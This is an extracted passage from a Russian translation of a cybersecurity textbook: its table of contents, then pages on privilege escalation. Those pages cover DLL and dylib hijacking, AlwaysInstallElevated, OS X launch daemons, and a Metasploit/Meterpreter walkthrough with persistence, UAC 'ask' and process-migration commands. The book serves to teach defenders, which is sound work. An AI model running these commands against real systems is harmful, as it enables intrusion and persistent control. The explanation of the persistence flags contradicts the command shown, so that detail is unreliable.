- •Об авторах
- •О рецензентах
- •Предисловие
- •Стратегия безопасности
- •Текущий ландшафт киберугроз
- •Приложения
- •Данные
- •Проблемы кибербезопасности
- •Старые методы и более широкие результаты
- •Изменение ландшафта угроз
- •Улучшение стратегии безопасности
- •Красная и Синяя команды
- •Подразумеваем взлом
- •Справочные материалы
- •Резюме
- •Процесс реагирования на компьютерные инциденты
- •Процесс реагирования на компьютерные инциденты
- •Создание процесса реагирования на компьютерные инциденты
- •Команда реагирования на компьютерные инциденты
- •Жизненный цикл компьютерного инцидента
- •Обработка инцидента
- •Передовые методы оптимизации обработки компьютерных инцидентов
- •Деятельность после инцидента
- •Реальный сценарий
- •Выводы
- •Реагирование на компьютерные инциденты в облаке
- •Справочные материалы
- •Резюме
- •Жизненный цикл атаки
- •Внешняя разведка
- •Сканирование
- •Доступ и повышение привилегий
- •Вертикальное повышение привилегий
- •Горизонтальное повышение привилегий
- •Проникновение и утечки
- •Тыловое обеспечение
- •Штурм
- •Обфускация
- •Управление жизненным циклом угроз
- •Справочные материалы
- •Резюме
- •Разведка и сбор данных
- •Внешняя разведка
- •Копание в мусоре
- •Социальные сети
- •Социальная инженерия
- •Внутренняя разведка
- •Анализ трафика и сканирование
- •Вардрайвинг
- •Завершая эту главу
- •Справочные материалы
- •Резюме
- •Компрометация системы
- •Анализ современных тенденций
- •Вымогательство
- •Манипулирование данными
- •Атаки на IoT-устройства
- •Бэкдоры
- •Атаки на мобильные устройства
- •Взлом повседневных устройств
- •Взлом облака
- •Фишинг
- •Эксплуатация уязвимостей
- •Уязвимость нулевого дня
- •Фаззинг
- •Анализ исходного кода
- •Типы эксплойтов нулевого дня
- •Перезапись структурированного обработчика исключений
- •Развертывание полезных нагрузок
- •Компрометация операционных систем
- •Компрометация удаленной системы
- •Компрометация веб-приложений
- •Справочные материалы
- •Резюме
- •Охота на пользовательские реквизиты
- •Стратегии компрометации реквизитов доступа пользователя
- •Получение доступа к сети
- •Сбор учетных данных
- •Взлом реквизитов доступа пользователя
- •Полный перебор
- •Социальная инженерия
- •Атака Pass-the-hash
- •Другие способы взлома реквизитов доступа
- •Справочные материалы
- •Резюме
- •Дальнейшее распространение по сети
- •Инфильтрация
- •Построение карты сети
- •Избежать оповещений
- •Дальнейшее распространение
- •Сканирование портов
- •Sysinternals
- •Общие файловые ресурсы
- •Удаленный доступ к рабочему столу
- •PowerShell
- •Инструментарий управления Windows
- •Запланированные задачи
- •Кража авторизационных токенов
- •Атака Pass-the-hash
- •Active Directory
- •Удаленный доступ к реестру
- •Анализ взломанных хостов
- •Консоли центрального администратора
- •Кража сообщений электронной почты
- •Справочные материалы
- •Резюме
- •Повышение привилегий
- •Инфильтрация
- •Горизонтальное повышение привилегий
- •Вертикальное повышение привилегий
- •Как избежать оповещений
- •Выполнение повышения привилегий
- •Эксплуатация неисправленных операционных систем
- •Манипулирование маркерами доступа
- •Эксплуатация специальных возможностей
- •Application Shimming
- •Обход контроля над учетной записью пользователя
- •Внедрение DLL-библиотек
- •Перехват порядка поиска DLL
- •Перехват поиска dylib
- •Исследование уязвимостей
- •Запускаемые демоны
- •Практический пример повышения привилегий в Windows 8
- •Выводы
- •Справочные материалы
- •Резюме
- •Политика безопасности
- •Проверка политики безопасности
- •Обучение конечного пользователя
- •Рекомендации по безопасности для пользователей социальных сетей
- •Тренинг по безопасности
- •Использование политики
- •Белый список приложений
- •Усиление защиты
- •Мониторинг на предмет соответствия
- •Справочные материалы
- •Резюме
- •Сегментация сети
- •Глубоко эшелонированная защита
- •Инфраструктура и службы
- •Документы в процессе передачи
- •Конечные точки
- •Сегментация физической сети
- •Открывая схему сети
- •Обеспечение удаленного доступа к сети
- •VPN типа «сеть–сеть»
- •Сегментация виртуальной сети
- •Безопасность гибридной облачной сети
- •Справочные материалы
- •Резюме
- •Активные сенсоры
- •Возможности обнаружения
- •Индикаторы компрометации
- •Системы обнаружения вторжений
- •Система предотвращения вторжений
- •Обнаружение на основе правил
- •Обнаружение на основе аномалий
- •Поведенческая аналитика внутри организации
- •Размещение устройств
- •Поведенческая аналитика в гибридном облаке
- •Центр безопасности Azure
- •Справочные материалы
- •Резюме
- •Киберразведка
- •Введение в киберразведку
- •Инструментальные средства киберразведки с открытым исходным кодом
- •Средства киберразведки компании Microsoft
- •Центр безопасности Azure
- •Использование киберразведки для расследования подозрительной деятельности
- •Справочные материалы
- •Резюме
- •Расследование инцидента
- •Масштаб проблемы
- •Ключевые артефакты
- •Исследование скомпрометированной системы внутри организации
- •Исследование скомпрометированной системы в гибридном облаке
- •Ищите и обрящете
- •Выводы
- •Справочные материалы
- •Резюме
- •Процесс восстановления
- •План послеаварийного восстановления
- •Процесс планирования послеаварийного восстановления
- •Вызовы
- •Восстановление без перерыва в обслуживании
- •Планирование на случай непредвиденных обстоятельств
- •Процесс планирования на случай непредвиденных обстоятельств в сфере IT
- •Передовые методы восстановления
- •Справочные материалы
- •Резюме
- •Управление уязвимостями
- •Создание стратегии управления уязвимостями
- •Инвентаризация ресурсов
- •Управление информацией
- •Оценка рисков
- •Оценка уязвимостей
- •Отчеты и отслеживание исправлений
- •Планирование реагирования
- •Инструменты управления уязвимостями
- •Реализация управления уязвимостями
- •Передовые методы управления уязвимостями
- •Реализация управления уязвимостями с помощью Nessus
- •Flexera (Secunia) Personal Software Inspecto
- •Заключение
- •Справочные материалы
- •Резюме
- •Анализ журналов
- •Сопоставление данных
- •Журналы операционной системы
- •Журналы Windows
- •Журналы Linux
- •Журналы брандмауэра
- •Журналы веб-сервера
- •Справочные материалы
- •Резюме
- •Предметный указатель
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||||||
|
|
X |
|
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|||||||
|
- |
|
|
|
|
|
d |
|
|
|
|
- |
|
|
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
F |
|
|
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
D |
|
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|||||
P |
|
|
|
|
|
NOW! |
o |
|
P |
|
|
|
|
|
|
|
NOW! |
o |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
Выполнение повышения привилегий 173to |
BUY |
|
|
|||||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
w Click |
|
|
|
|
|
|
|
|
m |
|
w Click |
|
|
|
|
|
|
|
|
m |
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
g |
.c |
|
|
|
|
. |
|
|
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
df |
|
|
|
n |
e |
|
|||||||
|
|
|
|
|
|
ческие библиотеки,которые используются конкретными приложениями,а за- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
|||||
|
|
|
|
|
|
тем помещают вредоносную версию с аналогичным именем в верхнюю часть |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
списка путей поиска. Поэтому когда операционная система ищет динамиче- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
скуюбиблиотекуприложения,онасначаланаходитвредоносную.Еслицелевая |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
программа запускается с привилегиями более высокого уровня,по сравнению |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
с пользователем компьютера, при запуске она автоматически повышает при- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
вилегии. В этом случае также получается доступ на уровне администратора |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
к вредоносной библиотеке. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Windows сначала находит |
Windows не получает |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
вредоносный DLL-файл |
легитимный DLL-файл |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Работающая программа |
Хакер вставляет вредоносную DLL |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
запрашивает DLL-файл |
в путь поиска |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Рис.8.10 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Приведенная ниже диаграмма иллюстрирует процесс перехвата dylib, когда |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
злоумышленникипомещаютвредоноснуюбиблиотекувпутьпоиска(рис.8.11). |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
ОС сначала находит |
К легитимной dylib доступ |
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
вредоносный файл |
так и не был получен |
|
|
|
|
|
|
|
|
|
|
|
|
Работающая программа запрашивает dylib
Хакер вставляет вредоносную библиотеку с тем же именем в путь поиска
Рис.8.11
Исследование уязвимостей
Исследование уязвимостей – один из немногих типов горизонтальных повы- шений привилегий, которые используются сегодня. Из-за строгости кодиро- вания и защиты систем, как правило, случаев горизонтального повышения привилегий стало меньше. Данный тип повышения привилегий осуществим для систем и программ, содержащих ошибки программирования. Эти ошиб- ки могут создавать уязвимости, которые злоумышленники способны эксплу-
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
174 Повышение привилегий |
|
|
|
|
to |
|
|
|
|
|
|
|||||||
w Click |
|
w Click |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
m |
||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
атировать для обхода механизмов безопасности. Некоторые системы будут |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
принимать определенные фразы в качестве паролей для всех пользователей. Это может быть ошибкой программирования, позволяющей разработчикам систем быстро получатьдоступ к ним.Однако злоумышленники могутбыстро обнаружить этот недостаток и использовать его для доступа к учетным запи- сям пользователей с высокими привилегиями.Другие ошибки в кодировании могут позволить злоумышленникам изменить уровни доступа пользователей в URL-адресе веб-системы.В Windows была программная ошибка,которая по- зволяла злоумышленникам создавать собственные мандаты Kerberos с права- ми администратора домена, используя обычные права доступа пользователя домена. Эта уязвимость носит название MS14-068. Несмотря на то что раз- работчики системы могут быть чрезвычайно осторожны, эти ошибки иногда появляются, предоставляя злоумышленникам возможность быстро повысить привилегии.
Иногда злоумышленник может воспользоваться преимуществами операци- онной системы для эксплуатации неизвестной уязвимости.
Классический пример – использование раздела реестра AlwaysInstallElevated, который присутствует в системе (установлен на 1) и позволяет установить пакет установщика Windows с повышенными (системными) привилегиями. Чтобы этот ключ считался включенным, нужно установить на 1 следующие значения:
[HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001
Злоумышленник может использовать команду reg query, чтобы проверить, присутствует ли этот ключ. Если нет, то появится сообщение, показанное на рис. 8.12.
Рис.8.12
Возможно, это звучит безобидно, но если вдуматься, то можно заметить проблему . В основном вы предоставляете привилегии системного уровня обычномупользователюдлязапускаустановщика.Чтоделать,еслипакетуста- новщика содержит вредоносное содержимое? Game over!
Запускаемые демоны
Использование запускаемых демонов – еще один метод повышения приви- легий, применимый к операционным системам на базе Apple, в особенности
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
Выполнение повышения привилегий 175to |
BUY |
|
|
||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
w Click |
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
|
m |
||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
OS X. При загрузке OS X обычно запускается launchd для завершения инициа |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
лизации системы. Этот процесс отвечает за загрузку параметров демонов из файлов plist, находящихся в /Library/LaunchDaemons. У демонов есть файлы списка свойств,указывающие на исполняемые файлы,которые должны быть запущены автоматически. Злоумышленники могут воспользоваться этим процессом автозапуска для повышения привилегий. Они могут установить собственные демоны для запуска и настроить их на запуск во время про- цесса загрузки, используя процесс launchd. Демоны злоумышленников могут получить замаскированные имена, похожие на относящиеся к ним ОС или приложения. Запускаемые демоны создаются с правами администратора, но выполняются с правами root.Поэтому если злоумышленники добьются успе- ха, указанные ими демоны будут запущены автоматически, а их привилегии расширены от администратора до пользователя root. Можно заметить, что злоумышленники снова используют легитимный процесс для повышения привилегий.
Практический пример повышения привилегий в Windows 8
Этот практический пример работает в Windows 8,а также,как сообщалось,эф- фективен и для Windows 10. В нем используются методы, о которых уже шла речь,аименноPowerShellиMeterpreter.Этотхитрыйметодвынуждаетпользо- вателякомпьютера,выбранноговкачествеобъектаатаки,невольноразрешать запуск легитимной программы, которая, в свою очередь, повышает привиле- гии. Следовательно, именно пользователь неосознанно позволяет злоумыш- ленникам наращивать свои привилегии. Процесс начинается в Metasploit и особенно в Meterpreter. Вначале используется Meterpreter для установления соединения с жертвой. Это соединение нужно злоумышленникам для отправ- ки команд на компьютер жертвы и эффективного управления ею.
Ниже приведен сценарий, называющийся persistence, который злоумыш- ленник может использовать для запуска сеанса с удаленной целью. Сценарий создает постоянного слушателя в системе жертвы, который запускается при загрузке.
Вот как это выглядит:
meterpreter >run persistence -A -L c:\ -X 30 -p 443 -r 10.108.210.25
Эта команда запускает обработчик на жертве (A), помещает Meterpreter на диск C компьютера-жертвы (L c: \) и даетслушателю указание запуститься при загрузке (X),выполнитьпроверку с интервалом в 30 с (i 30) и отвечатьна порту 443 IP-адреса жертвы. Хакер может проверить, было ли соединение простым, отправив команду reboot на компьютер жертвы и наблюдая за ее поведением.
Команда reboot выглядиттак:
Meterpreter> reboot
Если результаты удовлетворительны, злоумышленник может установить фоновую сессию и предпринять попытку повышения привилегий. Meterpreter
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
||
|
|
X |
|
|
|
|
|
||
|
- |
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
|
|||
|
|
|
|
|
BUY |
|
|
||
|
|
|
|
to |
176 Повышение привилегий |
||||
w Click |
|
||||||||
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
|
e |
|
|
|
|
|
|
|
n |
|
|
||
|
|
|
|
|
|
запустит сеанс в фоновом режиме и позволит |
|||
|
|
|
|
-xcha |
|
|
|
действия.
В терминале Metasploit выдается команда
Metasploit
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
выполнять другие |
|
|
|
|
|
|
||||
|
|
|
|
-x cha |
|
|
|
|
Msf exploit (handler)> Use exploit/windows/local/ask
ЭтакомандаработаетвовсехверсияхWindows.Онаиспользуетсядлязапро- са, чтобы пользователь на компьютере, выбранном в качестве цели, невольно повышал уровень выполнения атакующего. Пользователь должен щелкнуть ОК при появлении на экране ничего не предвещающей подсказки с запросом разрешения на запуск программы. Требуется согласие пользователя. Если оно не будет дано, попытка повышения привилегий не будет успешной. Поэтому злоумышленник должен попросить пользователя разрешить запуск легитим- ной программы, и именно здесь в действие вступает PowerShell. Следователь- но, злоумышленникам необходимо использовать ask с помощью PowerShell. Вот как это делается:
Msf exploit(ask)> set TECHNIQUE PSH
Msf exploit(ask)> run
Вэтотмоментнаэкранежертвыпоявитсявсплывающееокноспредложени- ем разрешить запуск PowerShell, полностью легитимной программы Windows. В большинстве случаев пользователь нажимает кнопку ОК. Получив разреше- ние, злоумышленник может использовать PowerShell для перехода от обычно- го пользователя к системному пользователю следующим образом:
Meterpreter> migrate 1340
Таким образом, 1340 указан как системный пользователь Metasploit. В слу- чае успеха злоумышленники получат больше привилегий. Проверка привиле- гий,которыми располагаютзлоумышленники,должна показать,что у них есть права администратора и системы. Тем не менее у администратора 1340 только четыре привилегии Windows,и их недостаточнодля выполнения крупной ата- ки. Злоумышленник должен наращивать свои привилегии, чтобы иметь воз- можность совершать больше вредоносных действий. Затем злоумышленники могут перейти на 3772, который является пользователем NT AuthoritySystem. Это можно сделать с помощью следующей команды:
Meterpreter> migrate 3772
У злоумышленников по-прежнему будут права администратора и пользо- вателя root, а также дополнительные привилегии Windows. Эти дополнитель- ные привилегии,коих 13,могутпозволитьзлоумышленникам совершитьмно жество действий с жертвой, используя Metasploit.
Выводы
В этой главе мы обсудили один из самых сложных этапов атаки. Хотя не все методы, используемые здесь, сложны. Как уже было сказано, есть два мето-